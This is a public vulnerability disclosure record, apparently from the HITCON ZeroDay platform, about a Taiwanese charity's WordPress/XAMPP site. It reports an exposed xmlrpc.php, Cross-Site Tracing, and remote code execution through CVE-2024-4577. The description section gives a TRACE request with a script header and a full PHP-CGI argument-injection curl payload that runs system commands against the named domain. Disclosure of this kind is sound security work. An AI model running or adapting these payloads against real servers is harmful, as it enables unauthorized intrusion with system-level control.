Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00004
- Vendor: 張方大慈善事業基金會
- Title: 張方大慈善事業基金會 xmlrpc可公開存取、XST、CVE-2024-4577
- Introduction: xmlrpc可公開存取、XST、CVE-2024-4577
處理狀態
目前狀態
公開
Last Update : 2025/03/17
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2025/01/01 23:11:59 : 新提交 (由 萌新 更新此狀態)
- 2025/01/02 06:48:46 : 新提交 (由 萌新 更新此狀態)
- 2025/01/02 06:49:29 : 新提交 (由 萌新 更新此狀態)
- 2025/01/03 16:59:00 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:56:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:56:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/01/17 11:56:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/03/17 03:02:50 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00004
- 通報者:nhd1261 (萌新)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://fangda.org.tw/
https://fangda.org.tw/xmlrpc.php
https://fangda.org.tw/xmlrpc.php
敘述
發現xmlrpc可公開存取,有被密碼爆破與Dos的風險。
XST:
curl.exe -i -X TRACE "https://fangda.org.tw/xmlrpc.php" -H "XST: <script>alert(1)</script>"
發現網站使用XAMPP,嘗試了一下CVE-2024-4577,成功RCE並發現是系統最高權限,建議立刻修補。
Payload:
curl.exe -o - "https://fangda.org.tw/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" --data '<?=`whoami & dir`;die();?>'
修補建議
修補方法:
https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability/
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。